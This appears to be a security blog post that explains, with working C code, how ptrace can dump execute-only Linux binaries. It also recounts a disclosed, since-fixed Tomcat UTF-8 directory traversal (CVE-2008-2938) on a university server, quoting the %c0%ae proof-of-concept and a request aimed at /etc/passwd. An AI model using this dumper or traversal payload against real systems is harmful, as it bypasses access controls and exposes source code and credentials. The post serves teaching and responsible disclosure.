
It is a good introductory book on recent trends in computer hacking, especially packing. Personally, the part on the ptrace-related weakness, a loophole in the design philosophy rather than a coding bug, is the most interesting. As you may know, a Linux file has three permission bits: read, write and execute. What if the superuser sets a file as executable but not readable? Even then, there is a way to dump the loaded image from memory back to a file on disk. The key is ptrace, the Linux interface for debugging processes. If we fork a child that asks to be traced (PTRACE_TRACEME) and then execs the root-owned, execute-only file (execl), the parent is notified at load time: the child stops right after execve, with the new image mapped but not yet running, and the parent can read that memory out word by word. Two caveats apply. The kernel drops a setuid/setgid bit on a traced execve, so the copy runs with our own privileges, and newer kernels (the would_dump() check in fs/exec.c) mark a process whose executable the caller cannot read as non-dumpable, which closes this loophole.

An excellent use case is a hacking game (wargame). To move up a level, we have to enter the password into a file owned by the higher level. We can launch that file but cannot read or write it. If we could read the executable, we could analyze it, for example simply by running strings on it. With this ptrace technique we get the same content while executing it!
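The technique described above as a worked C program. This is an added example, not code from the book or the original post: the program forks, the child requests tracing and execs the target, the parent waits for the post-execve stop, locates the segments backed by the executable in /proc/<pid>/maps, copies them out with PTRACE_PEEKDATA into a file at their original file offsets, and kills the child before it executes a single instruction. The function names, the output file name and the command-line usage are my own assumptions, and it only succeeds on a kernel old enough to lack the non-dumpable check mentioned above.

```c
#include <errno.h>
#include <fcntl.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Parse one /proc/<pid>/maps line: "start-end perms offset dev inode [path]".
 * Returns 0 on success, -1 if the line is not a maps entry. */
int parse_maps_line(const char *line, unsigned long *start, unsigned long *end,
                    char perms[5], unsigned long *offset, char *path, size_t pathlen)
{
    int consumed = 0;
    if (sscanf(line, "%lx-%lx %4s %lx %*s %*s%n", start, end, perms, offset, &consumed) < 4
        || consumed == 0)
        return -1;
    const char *p = line + consumed;
    while (*p == ' ') p++;
    size_t n = strcspn(p, "\n");
    if (n >= pathlen) n = pathlen - 1;
    memcpy(path, p, n);
    path[n] = '\0';
    return 0;
}

/* Copy len bytes of the stopped tracee's memory at addr into out, one word at a time. */
static size_t peek_bytes(pid_t pid, unsigned long addr, unsigned char *out, size_t len)
{
    size_t got = 0;
    while (got < len) {
        errno = 0;
        long word = ptrace(PTRACE_PEEKDATA, pid, (void *)(addr + got), NULL);
        if (word == -1 && errno != 0) break; /* unmapped: stop here */
        size_t chunk = len - got < sizeof word ? len - got : sizeof word;
        memcpy(out + got, &word, chunk);
        got += chunk;
    }
    return got;
}

/* Run `path` under PTRACE_TRACEME. The child stops at the SIGTRAP that follows a
 * successful execve: the image is mapped but no instruction has run. Every mapping
 * backed by that executable is copied to `outfile` at its file offset (the tail of
 * the last segment is page-rounded, so the dump can be slightly longer than the
 * original). Returns bytes written, or -1 on error. The child is killed afterwards. */
long dump_exec_only(const char *path, const char *outfile)
{
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        ptrace(PTRACE_TRACEME, 0, NULL, NULL);
        execl(path, path, (char *)NULL);
        _exit(127); /* exec failed: the parent sees an exit, not a stop */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFSTOPPED(status)) return -1;

    long total = -1;
    char buf[64], exe[4096];
    snprintf(buf, sizeof buf, "/proc/%d/exe", pid);
    ssize_t n = readlink(buf, exe, sizeof exe - 1); /* resolved path, as maps shows it */
    snprintf(buf, sizeof buf, "/proc/%d/maps", pid);
    FILE *maps = n < 0 ? NULL : fopen(buf, "r");
    int fd = open(outfile, O_WRONLY | O_CREAT | O_TRUNC, 0600);
    if (maps && fd >= 0) {
        exe[n] = '\0';
        total = 0;
        char line[4352], perms[5], mpath[4096];
        unsigned long start, end, off;
        unsigned char page[4096];
        while (total >= 0 && fgets(line, sizeof line, maps)) {
            if (parse_maps_line(line, &start, &end, perms, &off, mpath, sizeof mpath) != 0
                || strcmp(mpath, exe) != 0)
                continue; /* only segments backed by the target executable */
            for (unsigned long a = start; a < end; a += sizeof page) {
                size_t want = end - a < sizeof page ? end - a : sizeof page;
                size_t got = peek_bytes(pid, a, page, want);
                if (got == 0) break;
                if (lseek(fd, (off_t)(off + (a - start)), SEEK_SET) < 0
                    || write(fd, page, got) != (ssize_t)got) { total = -1; break; }
                total += got;
            }
        }
    }
    if (maps) fclose(maps);
    if (fd >= 0) close(fd);
    kill(pid, SIGKILL); /* never let the target actually run */
    waitpid(pid, NULL, 0);
    return total;
}

int main(int argc, char **argv)
{
    if (argc != 3) { fprintf(stderr, "usage: %s <execute-only-binary> <outfile>\n", argv[0]); return 2; }
    long n = dump_exec_only(argv[1], argv[2]);
    if (n < 0) { perror("dump failed"); return 1; }
    printf("wrote %ld bytes to %s\n", n, argv[2]);
    return 0;
}
```

The dump is taken before the first instruction runs, so a packer's unpacking stub has not yet touched the image and the file on disk is what gets reconstructed, not the unpacked code; letting the child run to a later breakpoint and dumping then is the same idea applied to packing.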


I reported a vulnerability to the KAIST Security Team, and they sent an email saying that they had corrected it.

When I was evaluating the lectures I took this semester, I found that the KAIST portal redirects the page to a separate 'lecture' server. Surprisingly, it was running on the Tomcat framework, but what was the problem?
Below is the address I was redirected to from “http://portal.kaist.ac.kr/[blabla]“:
“http://lecture.kaist.ac.kr/lecture/student/[blabla].mxml”
The thing is that one of the most fundamental rules of the web, the browser's same-origin policy, does not let one server (strictly, one origin) share cookies or script state with another, from both the HTTP and the JavaScript standpoint.
So how do the servers share the logged-in state (the cookie) between the portal and the 'lecture' server? It turns out to be a POST request: looking at the HTML source of the portal page, I can see it carries messy hidden fields, including a personal security ID. That means anyone who can capture the plain HTML passing between the browser and the server can obtain that information, a so-called man-in-the-middle attack.
Next, try to understand the URL hierarchy.
Check first: “http://lecture.kaist.ac.kr/lecture”
Konglish-named JSP files for an administrator.
Then check “http://lecture.kaist.ac.kr”
But the most serious problem is the server banner: Tomcat/5.5.26. That release is affected by the UTF-8 directory traversal CVE-2008-2938 (fixed in 5.5.27), which applies when the connector decodes URIs as UTF-8 and the context has allowLinking enabled. %c0%ae is an overlong UTF-8 encoding of '.', which a strict decoder must reject but this version accepted, so each %c0%ae%c0%ae pair became a '..' that the server's ordinary traversal check had not caught. The published proof-of-concept reads:

If your webroot directory has three depth (e.g. /usr/local/wwwroot), an
attacker can access arbitrary files as below. (Proof-of-concept)
http://www.target.com/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/foo/bar
Combining both facts, the list of JSP file names and the file-access vulnerability, any student could read those JSP sources and, through them, reach the database. Even more seriously, those JSP files must contain the admin database ID and password, because they are the files that process the evaluation-result database (or something similar).
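To see why %c0%ae works, here is an added C example; it is not Tomcat's code and not from the advisory. It percent-decodes a request path to bytes, runs a small UTF-8 decoder over them with an optional overlong check (the lenient branch stands in for a decoder that accepts overlong forms), and then counts how far the decoded path climbs out of the webroot. The request path and the three-level webroot are the advisory's; the function names and the constructed input are my own.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

static int hexval(int c)
{
    return isdigit(c) ? c - '0' : tolower(c) - 'a' + 10;
}

/* Decode one UTF-8 sequence from s (n bytes available); *adv receives the bytes consumed.
 * Returns the code point, or -1 on malformed input. With strict=1 an overlong form (a code
 * point written in more bytes than it needs, e.g. C0 AE for '.') is rejected, as RFC 3629
 * requires; with strict=0 it is accepted, which is how %c0%ae turned into '.'. */
long utf8_next(const unsigned char *s, size_t n, size_t *adv, int strict)
{
    if (n == 0) return -1;
    unsigned c = s[0];
    size_t len;
    long cp, min;
    if (c < 0x80) { *adv = 1; return c; }
    if ((c & 0xE0) == 0xC0) { len = 2; cp = c & 0x1F; min = 0x80; }
    else if ((c & 0xF0) == 0xE0) { len = 3; cp = c & 0x0F; min = 0x800; }
    else if ((c & 0xF8) == 0xF0) { len = 4; cp = c & 0x07; min = 0x10000; }
    else return -1;
    if (n < len) return -1;
    for (size_t i = 1; i < len; i++) {
        if ((s[i] & 0xC0) != 0x80) return -1;
        cp = (cp << 6) | (s[i] & 0x3F);
    }
    if (strict && cp < min) return -1; /* overlong encoding */
    *adv = len;
    return cp;
}

/* Percent-decode `raw` to bytes, then UTF-8-decode them into an ASCII path in `out`
 * (code points >= 0x80 become '?'). Returns 0, or -1 if decoding is rejected. */
int decode_request_path(const char *raw, int strict, char *out, size_t outlen)
{
    unsigned char bytes[1024];
    size_t nb = 0, i = 0, o = 0;
    for (const char *p = raw; *p && nb < sizeof bytes; p++) {
        if (*p == '%' && isxdigit((unsigned char)p[1]) && isxdigit((unsigned char)p[2])) {
            bytes[nb++] = (unsigned char)((hexval(p[1]) << 4) | hexval(p[2]));
            p += 2;
        } else {
            bytes[nb++] = (unsigned char)*p;
        }
    }
    while (i < nb) {
        size_t adv;
        long cp = utf8_next(bytes + i, nb - i, &adv, strict);
        if (cp < 0 || o + 1 >= outlen) return -1;
        out[o++] = cp < 0x80 ? (char)cp : '?';
        i += adv;
    }
    out[o] = '\0';
    return 0;
}

/* Lowest directory level a path reaches relative to its starting directory (0).
 * A negative result means the path climbs out of the webroot; -3 from a webroot
 * three levels deep such as /usr/local/wwwroot reaches the filesystem root. */
int min_depth(const char *path)
{
    int depth = 0, lowest = 0;
    for (const char *p = path; *p;) {
        while (*p == '/') p++;
        const char *seg = p;
        while (*p && *p != '/') p++;
        size_t len = (size_t)(p - seg);
        if (len == 2 && seg[0] == '.' && seg[1] == '.') {
            if (--depth < lowest) lowest = depth;
        } else if (len > 0 && !(len == 1 && seg[0] == '.')) {
            depth++;
        }
    }
    return lowest;
}

int main(void)
{
    /* Constructed request: the advisory's proof-of-concept shape aimed at /etc/passwd. */
    const char *raw = "/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd";
    char out[256];
    if (decode_request_path(raw, 0, out, sizeof out) == 0)
        printf("lenient decoder: %s (min depth %d)\n", out, min_depth(out));
    printf("strict decoder: %s\n", decode_request_path(raw, 1, out, sizeof out) == 0 ? out : "rejected");
    return 0;
}
```

The lenient decoder yields /../../../etc/passwd with a minimum depth of -3, exactly three levels up from a webroot like /usr/local/wwwroot; the strict decoder rejects the request outright, which is the fix: reject overlong sequences, and normalize the path only after all decoding is done.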
Whenever I see a vulnerability (an occupational disease, maybe), I want to inform the administrator of it.
So I reported this problem to the Security Team as quickly as possible, and all of the problems have already been fixed.
What about your web server? Check it today, otherwise hackers will exploit it for fun.